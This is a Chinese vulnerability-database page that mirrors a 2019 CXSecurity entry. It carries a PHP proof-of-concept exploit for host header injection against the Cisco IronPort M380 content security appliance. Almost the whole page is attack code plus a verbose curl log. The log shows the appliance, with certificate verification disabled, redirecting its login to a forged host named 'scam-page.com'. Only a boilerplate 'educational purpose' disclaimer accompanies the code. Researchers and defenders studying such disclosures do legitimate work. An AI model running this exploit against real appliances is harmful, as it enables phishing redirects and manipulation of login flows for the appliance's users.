Cisco Content Security Virtual Appliance M380 IronPort Remote Cross Site Host Modification - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1735717 漏洞类型
发布时间 2019-09-10 更新时间 2019-09-10
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019090075
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
<?php
//
//  Cisco Content Security Virtual Appliance M380 IronPort Remote Cross Site Host Modification Demo Exploit
//
//
//  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
//
//
//  Disclaimer:
//  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
//  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
//  caused by direct or indirect use of the  information or functionality provided by these programs. 
//  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
//  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
//  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
//  responsibility.
//   
//  Use them at your own risk!
//
//
//      [test@localhost ironport]$ php -S localhost:1337 ironport_m380.php
//	PHP <HIDDEN> Development Server started at Sun Sep  8 16:47:43 2019
//	Listening on http://localhost:1337
//	Document root is /home/test/ironport
//	Press Ctrl-C to quit.
//	* About to connect() to 192.168.1.1 port 443 (#0)
//	*   Trying 192.168.1.1... * connected
//	* Connected to 192.168.1.1 (192.168.1.1) port 443 (#0)
//	* Initializing NSS with certpath: sql:/etc/pki/nssdb
//	* skipping SSL peer certificate verification
//	* SSL connection using TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
//	* Server certificate:
//	* 	subject: 
//	* 	start date: Mar 19 00:00:00 2018 GMT
//	* 	expire date: Mar 18 23:59:59 2020 GMT
//	* 	common name:   
//	* 	issuer: 
//	> GET / HTTP/1.1
//	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
//	Cache-Control: no-cache
//	Content-Type: application/x-www-form-urlencoded; charset=utf-8
//	Host: scam-page.com
//	Referer: scam-page.com
//	User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0
//	
//	* HTTP 1.0, assume close after body
//	< HTTP/1.0 303 Redirecting
//	< Server: glass/1.0 Python/2.6.4
//	< Date: Sun, 08 Sep 2019 13:47:59 GMT
//	< Content-Type: text/html
//	< X-Frame-Options: SAMEORIGIN
//	< Set-Cookie: sid=InCkP0xGNg7fyAqL2mAO; expires=Tuesday, 10-Sep-2019 13:47:59 GMT; httponly; Path=/; secure
//	< Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
//	< Pragma: no-cache
//	< Expires: Sun, 08 Sep 2019 13:47:59 GMT
//	< Last-Modified: Sun, 08 Sep 2019 13:47:59 GMT
//	< Location: https://scam-page.com/login?CSRFKey=c17fd622-f031-f0e0-2cab-2854acb4a443&referrer=https%3A%2F%2Fscam-page.com%2FSearch
//	< 
//	* Closing connection #0
//	* About to connect() to 192.168.1.1 port 443 (#0)
//	*   Trying 192.168.1.1... * connected
//	* Connected to 192.168.1.1 (192.168.1.1) port 443 (#0)
//	* skipping SSL peer certificate verification
//	* SSL connection using TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
//	* Server certificate:
//	* 	subject: 
//	* 	start date: Mar 19 00:00:00 2018 GMT
//	* 	expire date: Mar 18 23:59:59 2020 GMT
//	* 	common name:   
//	* 	issuer: 
//	> GET / HTTP/1.1
//	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
//	Cache-Control: no-cache
//	Content-Type: application/x-www-form-urlencoded; charset=utf-8
//	Host: scam-page.com
//	Referer: scam-page.com
//	User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0
//	
//	* HTTP 1.0, assume close after body
//	< HTTP/1.0 303 Redirecting
//	< Server: glass/1.0 Python/2.6.4
//	< Date: Sun, 08 Sep 2019 13:48:00 GMT
//	< Content-Type: text/html
//	< X-Frame-Options: SAMEORIGIN
//	< Set-Cookie: sid=NPPfo6uXJ5gPbJSPcNDE; expires=Tuesday, 10-Sep-2019 13:48:00 GMT; httponly; Path=/; secure
//	< Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
//	< Pragma: no-cache
//	< Expires: Sun, 08 Sep 2019 13:48:00 GMT
//	< Last-Modified: Sun, 08 Sep 2019 13:48:00 GMT
//	< Location: https://scam-page.com/login?CSRFKey=32b0b069-34bb-1fdf-9f92-2de72a24cb65&referrer=https%3A%2F%2Fscam-page.com%2FSearch
//	< 
//	* Closing connection #0
//	


$url = "https://192.168.1.1";
$fake_host = "scam-page.com";
$ch = curl_init(); 

curl_setopt($ch, CURLOPT_URL, $url); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_VERBOSE, true);
$headers = [
    'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Cache-Control: public',
    'Content-Type: application/x-www-form-urlencoded; charset=utf-8',
    'Host: '.$fake_host,
    'Referer: '.$fake_host, 
    'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0',
];
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$output = curl_exec($ch); 
curl_close($ch);
echo $output;